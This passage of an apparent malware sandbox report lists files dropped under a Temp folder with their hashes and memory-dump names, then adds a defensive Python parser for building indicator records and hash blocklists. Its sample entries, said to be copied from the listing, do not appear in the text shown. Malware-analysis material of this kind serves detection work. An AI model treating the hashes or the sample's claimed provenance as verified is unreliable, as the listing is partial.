SHA512 5f670f733bbdcb147fcdbbce14d3eafa06ac7e26ab839f8185aa1658cd4104e5ced7205530950e9e5b4cd384080e2fdc3291a899c6d6825a9839a42950071791

C:\Users\Admin\AppData\Local\Temp\woMi.exe

MD5 df8e3604caa016205fb1ce07a1712aec
SHA1 4bbba145069f3b521c7d0cd3e3bc112f343ba5c9
SHA256 465138d606ba1ff765f12b25fd5559d894410f7efc651f7de82cb84fe6f91dfd
SHA512 1c45a02b056c4071ab0bba6026597c1292da48c7fe3c8abb12657f7a64800d71ffca703672a7a9b1286fdc37b5f994c00429845d11976feba0a60870b39c31a3

memory/4452-749-0x0000000000401000-0x0000000000476000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\QEQO.exe

MD5 5baaf73a42ab57e185aba70a22fc6ef8
SHA1 42191d7ffdd7825d4716521209cff8e0b6d62b08
SHA256 2a5c619a86f9661c269eae111a31b5b5558154a500355045352603b44cb97a12
SHA512 3abc8bd80a9cfad846ef8ab73491260db86d85a312c7159ce1e3832a6d14a2ec57093b9e237995906ff7967c92fc61a4331d7aa07e178f031d153a9ff3ba236c

C:\Users\Admin\AppData\Local\Temp\kwQO.exe

MD5 e71e82bcbe53385bede889c6a7eb2577
SHA1 d6502d1817877eb6e41b723fc19c92dca0e07dee
SHA256 ccd5dec251ae0fe822086c92bb829811992131548bb28533e3007748bfc8d8aa
SHA512 3eec6ae95cb2a77be859734386def0cba279918ac77abe4cf594ff2a9e4fe652d4955f2c40bbc896b29a26347284d8b5285360dbdc1dab44509bb0fbc473ea29

C:\Users\Admin\AppData\Local\Temp\oQcg.exe

MD5 eb35dea90bebc1c88a4322ea61d55d29
SHA1 810944b1706233c806e34554bf6de300bc5a936e
SHA256 f574d5fcf14ca9baef7be71ad1845846a3686c628bf4bb3be727ac08295845b3
SHA512 4b6c5a1c49f22c3d28da552f3987cc7201833677a4a61315f1f0dc5bca4a1613263d8ea3dc4a181597467eb0e6ac59b3b22a94d2208ee39068d086081724c9bd

C:\Users\Admin\AppData\Local\Temp\ckoy.exe

MD5 1e63236a47bf9ea8b3e939bbc56a0a2a
SHA1 b87e5c2ce0f18419be18ec5046d5c23110801be0
SHA256 fc27ded360479bccb78d567a1eb6bfbeae0f20de14a804572d108df08e726b66
SHA512 7ea3ce2f3a1a0f2ebe4f97053bbe69683f92326eaf5210284e799ee57f615d8917bc7a17a407bc4f41f97155448beec413f7fd7b902583c597e2c83dcb91467c

C:\Users\Admin\AppData\Local\Temp\GUAW.exe

MD5 bf1a93bb4c14ca1278741051d8655447
SHA1 229b754231964df5b9d9d85ae4d590f7bf9e242a
SHA256 740a816e38cf25d2dd39de13ff871a4d8b4dd6f8d34f6aa698c764176374a88f
SHA512 358e36462d13397d0a353e4e6883c4be6d9ced7d05c3d3307f56ed8180eaf3226a299228f2665dcd8f983f44609184be73b80e429ec9c501224775c1884bef1f

C:\Users\Admin\AppData\Local\Temp\cEkK.exe

MD5 8cc63afaf736edc0f2562d0b19ef6ad9
SHA1 26910731a8d998a3c1705d84b31bb607bea774b5
SHA256 4dd690c9007646d7588684008bb770661b333bca2d91b647e74b3af25bae8ca5
SHA512 a7c9208df9aa18680dd5ea06a5565b3e1128b00fc1b3d2eecf7d57e6fe1f3ce925e4772ab0ee037d9a500dd49e58eab68345ac334ef8aa111dd61966ade48326

C:\Users\Admin\AppData\Local\Temp\UsEw.exe

MD5 2b9f149787108501c19841dd5e29879a
SHA1 708a159bd78c7974983a234139925b2bb1e46fd7
SHA256 6e68fe298a8d9f82720dce45393f0d17dbaf94d73012e17559ded9da5d6d8ae0
SHA512 d3e5c724a23b964ac189966da42dca353326c0d557b258235dfa6fcaed12f38eeac8febf663882a3c9cd8afd515050f55a32b6f3215dfd84a29260fa9a70a00c

C:\Users\Admin\AppData\Local\Temp\aEce.exe

MD5 f94c59351e218eb1dd42caaaaa3e9b55
SHA1 c341b65235c6ec8f3f693668fcd07c779d45a82b
SHA256 a85495767cfc6d10a0b3a8f582e4d3b0ca9d25f95c1f350ec3a16cd2b6dc7485
SHA512 954e4f18da62aca6ae395d5bed24a2480d0f71f0f31ef9665e3fc5528f6e128a7e09c8b33f468097ba9040159f5876eeb599e1b5fa949352fef06ecf5b86f9f3

C:\Users\Admin\AppData\Local\Temp\iwoY.exe

MD5 5c845dc714a11da6b0384cded99f0b96
SHA1 07147dff899f547d10bdee437b8c172d18c92252
SHA256 0fac71627d8ae42096f148ecb7f46ce820ce1ca829af7462ba080b8bb99a7d8c
SHA512 abbdd218b03b2eea08205ea0e2cc88ff056f68c5e194d8e3472aa4a895420923c7f1449ed51abf642a92a53caffd0ac6ae5b926bb54bb34cf7b6b7e6c70f317c

C:\Users\Admin\AppData\Local\Temp\McMW.exe

MD5 dd9769d86bae7fde74d93e052b926ecc
SHA1 7a04f74345acd9d74e602724e140a25706ed89e3
SHA256 3029c93f4cebb21ebcfd4de0389ec33fdb0be04a3105e1eb329ac1e2def0efbb
SHA512 ff3df4550780f29c4d76e49e11e216d090fc985b3f525c8f1b0a6702a43b89f3765631561b96d0dc8e6b7eacaf422c63b7916811ff82205e186becd09ab47dde

C:\Users\Admin\AppData\Local\Temp\AYgy.exe

MD5 ec8197ba8c9852cd881ba3615d57e822
SHA1 8aa14fec954e7e1aa560dcf366b5affb791568b4
SHA256 fa38146c4fab53eb966f33ab31eabaf24c0a2bc4d3c3e067a5a0f05a15e9333a
SHA512 48d94f89b3659523ee3fcef3b58f82ca30e459851f45912bd77c2f83552d8a02236f0c91882a1b64badcc994f49f6ac544394c893ced7d5f3788320fe76bd3a7

C:\Users\Admin\AppData\Local\Temp\OUMw.exe

MD5 ca7400fa860ed7e9ad9b1b6333fbb18d
SHA1 1ef3b1745db87eff7b44fb71a916bcb4d8288de4
SHA256 14fe752e9d3e8185c33d444a92d507e210c25ddf3df7f18f1f09468089616c55
SHA512 77d5e168daf31aca0380a502fa54ff895814269103bf1d6d527bec8a54e19ba7853feaa976926cf20917420bd938c45faaf95a45e8ee89ec01955e15ee65dec3

C:\Users\Admin\AppData\Local\Temp\WEoy.exe

MD5 dd2e26aa4e32568fd09fe929d83a6110
SHA1 5b7c47b8d4133fe32a7d0f933ac9d51897c8635a
SHA256 08774de14d24269ff905b6064d4361c6783e3cdf75054538dd15442d60967fad
SHA512 0520a3a40aaa0d39d09eeb51248af4d8912f622489803e1c0cf589bdc8ef6535aad07ac1f8a475333af8ea1bba7bca63423cc172266c3c5ab05d19c47ceab3d8

C:\Users\Admin\AppData\Local\Temp\AYkQ.exe

MD5 9f274236cd3641f4a371ccacdc2b4118
SHA1 9bb358203b4be301d3268947d77770e1b05e752d
SHA256 4f845459806e0019178c7952f4f5e074cd2c8c4d321f528bc3522b5108d151c1
SHA512 1d62f83a69c075df30df86e2c3dc39f089dc42d17c5fdcbb598ed42059d94e8398ff6653e73f8945e01e614e902cdd4b7ab05b657a53c03be93e599a6bb5a953

C:\Users\Admin\AppData\Local\Temp\mYwY.exe

MD5 160d29c2a5c346e54cba1d0be4ee166c
SHA1 14781863cff84a5c807478f0e0979107301506f8
SHA256 8da07686026cefc004cf618cf5b7a45115b3e7189887720f00b4096945e06581
SHA512 11ddf38f6926ba385b413dc178e359278feed46f906462f3ec743ab347cdfabecbdb011dd48275470a2cccbd5f5e8045672bc73cd2f671ee2e483c19e93007e9

C:\Users\Admin\AppData\Local\Temp\GgIg.exe

MD5 12693cea22b91464ffa0fd62d429c29b
SHA1 7409004376e94a51dc2716328d125fceee6746ba
SHA256 54df3cd2d90c168308c91bb5c5b6406264b2373f23d22a8e3dc86978ddd7860e
SHA512 a71a1415c9a8b5216831083756ba2da227f6673a37479e4faa0cc36cbc215e19ffaf5c4219029565a29e917252eae217b0ebc8e53caf7ae94aac203dc8dd6453

C:\Users\Admin\AppData\Local\Temp\yYkY.ico

MD5 f31b7f660ecbc5e170657187cedd7942
SHA1 42f5efe966968c2b1f92fadd7c85863956014fb4
SHA256 684e75b6fdb9a7203e03c630a66a3710ace32aa78581311ba38e3f26737feae6
SHA512 62787378cea556d2f13cd567ae8407a596139943af4405e8def302d62f64e19edb258dce44429162ac78b7cfc2260915c93ff6b114b0f910d8d64bf61bdd0462

C:\Users\Admin\AppData\Local\Temp\isUk.exe

MD5 adcd36a46b0e07970208b3b6730ffac6
SHA1 6b96431291116ed2e328a8141eb1225be3c3cbe2
SHA256 52429d17469542113e58669007d855172c40fa793c030f552976ad22f07e4b06
SHA512 69ed734e5bbbd63b6cd55bc146a1227872342fb0a5bafb979fd99b79bccc6bdac8d00796f16eb65ec963aa4725ba6c4070e75c27b865c4c99ce079ccbed8498c

C:\Users\Admin\AppData\Local\Temp\sUIg.exe

MD5 5c220954605447cef2c5e8ece5049aa3
SHA1 15da08583158ebc8df23406318c782e044d87ea1
SHA256 a921ee94daee7d1f75cf0ff0ac71cdd798ce118ffa802bf2c59f03a3f0b6d143
SHA512 06c9273129f42db31cafee6ee8bd8fb9ac363c276483486aaeedabafd36e0adef2c88f992a34cd96a2e1c9732a2507c5dc62daad4157d7e8333bb9a3f4182869

C:\Users\Admin\AppData\Local\Temp\ocII.exe

MD5 29b11b9214801c6e243194c48c7dddc2
SHA1 63d3f2519812961d27ab19727cbb21a30ec9488b
SHA256 3361247ddbf632d19eb58a13e45228669fbb0116404ff4941ce74156a7bc2a2b
SHA512 779b798c83fd94d0730f55212623527ad8212cc25c52efe98960f5f76dbd1006b7b6291675cfd66ef8e6480052280149c4125e567f35708e0b1e16c1faffdfe8

C:\Users\Admin\AppData\Local\Temp\yEEi.exe

MD5 d31e446fd9646be63c79d95a0e07eaaf
SHA1 bac272903e80cd6408010344d71aba7207381415
SHA256 2bb7c435e9382fe2fc8a8ff841069a557159f60edf965a2811f77d43252e8a17
SHA512 79deff3c7a7543b9c43b94bbfdb9234739f86adaeda24bb8be8618cce42547cb215d91b5fbdb1039da5c7d3b5f417f5eb172a04df306bccb92154a403c6c1dc3

C:\Users\Admin\AppData\Local\Temp\cwIG.exe

MD5 9f4ec056a4cb953f2623b5c1269aa325
SHA1 a4979955558515017cc3d3d483c09cf24d7469e4
SHA256 5e07a9e78992a659bb636554deaad83a92b3e8f35696f54cce672e8226fb20de
SHA512 46841f9017770febc15b34e7c13edf3aeb0e70f5f3d5d474311416ca09a00d758de8325d5744c830349b183454c50473fd494a8b29209245d4e599ee3009e967

C:\Users\Admin\AppData\Local\Temp\oEYc.exe

MD5 89745a8bed6aae7192436b2f9b3be41a
SHA1 6eb80b8b59e6fa8e4dbb769045966e734c586c33
SHA256 40df1f7402512c62af25b957bce4a0883ce0f2f67a8683e3695dd003c5edb8cc
SHA512 d1cc099fdd43d1f8a6ad1ecae3d675943e335604eb52ba8acd49129bc11d82b15d1b610230864cc84973aefcf512e58ae504bf9c9ef23e582c21814f6bcb8081

memory/3728-1022-0x0000000000400000-0x000000000046E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\QsEe.exe

MD5 ac56cc86e6d52baa554d968c7df904ae
SHA1 342b02c450b5254de2792fad11265c4da6236dbb
SHA256 3e23180477faa02beb78311496e8e85be915b7dde5f5203d1abfb00ecf18aa88
SHA512 aa1d8b9b6cec0e6fe752355412b86716b4505a6f731759446d164c0305857026c8b051f433ce8e7151b98ac6da8e2c8aae9b2bfd0cdb1de7caff5151d1c6929d

C:\Users\Admin\AppData\Local\Temp\WQoS.exe

MD5 f04757bc2dc3af6faa366b18e6713ac2
SHA1 7dc16a50dfc4a45ce070f8ee296bc6dd886dbaa3
SHA256 77ca76b888e9270854b32a09a418ed925ecf3537e4024b83b84c851351200c90
SHA512 da062bee38938b7c368a527a4699cdd8857fae2648aac2315c10bc21d1b879d91999aada48dbe9f4d9ba14c74f6d12624b81f07a59c0bddbb9e5512563c25b7d

C:\Users\Admin\AppData\Local\Temp\EsUw.exe

MD5 aa0ea4640e1f7f8e22877f3ed4278e86
SHA1 ad033ae2f748a0d74954088fd3982b84cb05a4b1
SHA256 eb60dec8890d058b3eca685c516dee3f0f2a15cd55f28993d755e67497af4b1f
SHA512 cd8c808470ed07ca1cbd52367d4cc7a61aca22712eb600742c5d22614cea52cb711b35168aee23dce066c1e1292e6cb5b52466817af71421a43ca4da12aac46e

C:\Users\Admin\AppData\Local\Temp\KEwu.exe

MD5 1879506906398c3fd3de894a7bd8c8c2
SHA1 5125462b41aaa44c928a8483dda8b1bcfbb8d9df
SHA256 fa5dce315d57b57311caee8ee200ad3bd804d21dacdda1be2d7f7a1621ed40c6
SHA512 3fd0fe200d6677b59733256d6d156496b7f403009490939a529cc88d426e5e44a63466826c21a9b1487cbafa530338431bed93c90ae525a6eb48b7bee3d83c83

C:\Users\Admin\AppData\Local\Temp\kIEG.exe

MD5 52be3e1d59dae0612d124b564e9abf4e
SHA1 e92fc59167993cf9d874d12166c92fd17ceeed6e
SHA256 c2c92907335cf59fd9c518d2640a892a3fb6cf3e1c887c4210dbf967bc1189b2
SHA512 1b4b08c9518793d43fdffaa662b45db56540a38523851d448210789110b23e95c44851f058a7dbceb05913aca3e65069263d218ec216b8d5c842bf5eec2f8790

C:\Users\Admin\AppData\Local\Temp\wwYi.exe

MD5 31b1737eea941978714de64507b5dbae
SHA1 83bed85cc476309811f6329ccc5e0f0efd144e6e
SHA256 614fbd34a55d2fef652d7a91098f4ab041a2c1f20f1a515cfa94647eefd478c2
SHA512 8866d7848a161dd824c4e5e0ad3f8317f5a2a2685ee1feefffc77c747a07a6f1c4fa27379092ad128d6f0a1fa1b16c7ab30bdee4bfbf3bea9c5f2e6e3d879a1a

memory/4476-1171-0x0000000000400000-0x000000000046E000-memory.dmp

memory/4452-1174-0x0000000000401000-0x0000000000476000-memory.dmp
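The listing above is the raw form most practitioners actually consume from a report like this: one dropped-file path per entry, followed by its MD5/SHA1/SHA256/SHA512 digests, interleaved with memory-dump artifacts. The parser below is an added example, not part of the sandbox's own tooling or of this report, that turns that listing into structured records, validates each digest's hex length (an extraction-truncated SHA256 will silently never match a blocklist), groups the drops by directory and extension, and decodes the memory-dump names. The sample input is constructed by copying four entries verbatim from the listing above; the `memory/PID-index-start-end-memory.dmp` naming convention is an inference from the visible lines and is treated as an assumption.

```python
"""Parse the dropped-file listing of a sandbox report into IOC records (added example)."""
import re
from collections import Counter
from dataclasses import dataclass, field

# Constructed sample: four entries copied verbatim from the "Files" listing above
# (one memory-dump line, two dropped PEs and the dropped batch file).
SAMPLE = r"""
memory/3728-6-0x0000000000400000-0x000000000046E000-memory.dmp

C:\ProgramData\WCwgcgww\QuYEoUUs.exe

MD5 7d3b698ba3e7840e24fce6c17981bb1b
SHA1 114475bf403aac4f9c217da9b829f84836c963a4
SHA256 4fd6f26b39941694d92f0c9cb703111b1756ad808cad0020975b30ccbd63ce60
SHA512 7a35dd8a5d4deb0c125556447dd789799eda2feed7ec34e66713af714069b016035dadd26e46baf983ba6e8f38359c606d24de83170e6d3f4693f91def7a7999

C:\Users\Admin\AppData\Local\Temp\ZckUMcco.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\WAMm.exe

MD5 9e70543da8316896f6dd0da9c4c1ab84
SHA1 668e90901fe4d701352a26099cdaafe0f4ccb5fc
SHA256 0dd452941b9fa4d1d1bbb9686713492491db8c83ee6c11264deabe4b1e5b59dc
SHA512 27d6e537e34e365f93790faf81a3a783e81bb71058c14cef301ebfb29d22131c09220b5fcd4451806311d3dde440c9550844a4b74d0586d807e16844ab0fc0bd
"""

# Expected hex length of each digest; anything shorter is an extraction artifact, not an IOC.
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
# Assumed layout of the dump names: memory/<pid>-<index>-0x<start>-0x<end>-memory.dmp
DUMP_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9a-fA-F]+)-0x([0-9a-fA-F]+)-memory\.dmp$")


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)

    def is_complete(self):
        # All four digests present, each with the full expected hex length.
        return all(len(self.hashes.get(k, "")) == n for k, n in HASH_LEN.items())


def parse_files_section(text):
    """Return (dropped files, memory-dump names) from a report's Files listing."""
    files, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_RE.match(line)
        if m:
            if current is None:
                raise ValueError(f"digest line without a preceding path: {line}")
            current.hashes[m.group(1)] = m.group(2).lower()
            continue
        if line.startswith("memory/"):
            dumps.append(line)
            current = None          # digests never follow a dump line
            continue
        current = DroppedFile(path=line)   # any other line starts a new file entry
        files.append(current)
    return files, dumps


def parse_dump_name(name):
    """Decode pid, dump index and the dumped virtual address range from a dump name."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"unrecognised dump name: {name}")
    pid, idx, start, end = m.groups()
    return {"pid": int(pid), "index": int(idx), "start": int(start, 16), "end": int(end, 16)}


def summarize(files):
    """Count drops per directory and per extension to see where the sample stages files."""
    dirs = Counter(f.path.rsplit("\\", 1)[0] for f in files)
    names = [f.path.rsplit("\\", 1)[-1] for f in files]
    exts = Counter(n.rsplit(".", 1)[1].lower() if "." in n else "" for n in names)
    return dirs, exts


def blocklist(files, algo="SHA256"):
    """Digests suitable for a hash blocklist; incomplete records are excluded."""
    return {f.hashes[algo] for f in files if f.is_complete()}


if __name__ == "__main__":
    found, dumps = parse_files_section(SAMPLE)
    for f in found:
        print(("ok  " if f.is_complete() else "BAD ") + f.path)
    print(summarize(found))
    print([parse_dump_name(d) for d in dumps])
```

Feed the whole Files listing to `parse_files_section` and the directory counter makes the staging pattern visible at a glance (dozens of four-letter `.exe` drops under `%TEMP%`, plus the `C:\ProgramData\<random>\` copies); `blocklist` then yields only fully-formed digests, so a hash mangled by page extraction cannot end up as a dead entry in a detection rule.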